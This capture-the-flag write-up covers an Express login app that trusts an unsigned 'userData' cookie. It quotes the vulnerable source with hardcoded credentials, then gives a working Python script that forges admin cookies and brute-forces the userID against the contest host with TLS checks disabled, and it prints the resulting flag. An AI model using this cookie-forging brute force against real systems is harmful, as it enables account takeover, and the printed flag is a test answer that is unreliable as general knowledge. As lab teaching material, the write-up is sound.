Tags: web idor authentication 

Rating:

# Messi Believers
We are given a zip file, `messifans.zip`, and a simple web page with a login form. Extracting the zip gives us part of the web app's source; `app.js` is the interesting file:

```js
const users = [
  {
    userID: "972",
    username: "CR7Junior",
    password: "Messiteamo"
  },
  {
    userID: "REDACTED",
    username: "admin"
  }
]

app.get("/", (req, res) => {
  const adm = users.find(u => u.username === "admin")
  // cookie-parser has already turned the "j:{...}" cookie back into an object,
  // so everything below trusts whatever userID the client put in the cookie
  if(req.cookies && req.cookies.userData && req.cookies.userData.userID) {
    const {userID, username} = req.cookies.userData

    // the only authorization check: a string comparison against the admin's userID
    if(req.cookies.userData.userID === adm.userID) res.render("home.ejs", {username: username, flag: process.env.FLAG})
    else res.render("home.ejs", {username: username, flag: "No flag for u!"})
  } else {
    res.render("noauth.ejs")
  }
})
```

The snippet hardcodes one full credential pair, `CR7Junior:Messiteamo`, plus an `admin` user whose password and `userID` are not shown. Logging in as `CR7Junior:Messiteamo` works, and the server sets a cookie named `userData` with the value `j%3A%7B%22userID%22%3A%22972%22%2C%22username%22%3A%22CR7Junior%22%7D`, which URL-decodes to `j:{"userID":"972","username":"CR7Junior"}`. The `j:` prefix is how Express's `res.cookie()` serialises an object (`"j:" + JSON.stringify(obj)`), and `cookie-parser` turns it back into an object on the way in, which is why the handler above can read `req.cookies.userData.userID` directly.

Looking at the handler, session handling relies 100% on that cookie: there is no signature and no server-side session, so the `userID` the server compares against the admin's is whatever the client chooses to send, and the format is trivially guessable. If we knew the admin's `userID` we could forge the cookie and get the flag, but it is `REDACTED` in the snippet, so the remaining option is to brute-force it. Note that the comparison is `===` against a string, so the forged value has to be a JSON string (`"1234"`, not `1234`); the cookie template in the script below keeps the quotes for that reason.

Trial and error: `0` to `999` failed, `000` to `999` (in case it had to be a zero-padded three-digit value) failed too, and `1000` to `9999` succeeded. You can see my code below. It prints every response and I piped it into `grep` since I only wanted the flag, so I don't know the exact `userID`, only that it is somewhere in that range. I also tried multithreading, but it constantly gave me errors, so the single-threaded run takes a while.

```python
#!/usr/bin/env python3

import requests
# The server's certificate triggers SSL warnings; these two lines silence them
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = 'https://messifans.ctf.cert.unlp.edu.ar/'

# Forge the userData cookie with username "admin" and a candidate userID.
# This is the URL-encoded form of j:{"userID":"<x>","username":"admin"};
# the quotes around {} matter because the server compares userID with ===
# against a string.
for x in range(1000, 10000):
    brute = 'j%3A%7B%22userID%22%3A%22{}%22%2C%22username%22%3A%22admin%22%7D'.format(x)
    cookies = {'userData': brute}
    resp = requests.get(url, cookies=cookies, verify=False)
    # print everything and grep for "flag{" on the command line
    print(resp.text)
```
Output:
```
...

CTF No flag for u!


CTF No flag for u!


CTF No flag for u!


CTF flag{c00K1eee_m0nst3r_n00B}


CTF No flag for u!


CTF No flag for u!


CTF No flag for u!


...
```

**FLAG: flag{c00K1eee_m0nst3r_n00B}**

Original writeup (https://gasfad01.github.io/p/metared-international-ctf-2021-4th-stage-writeup/).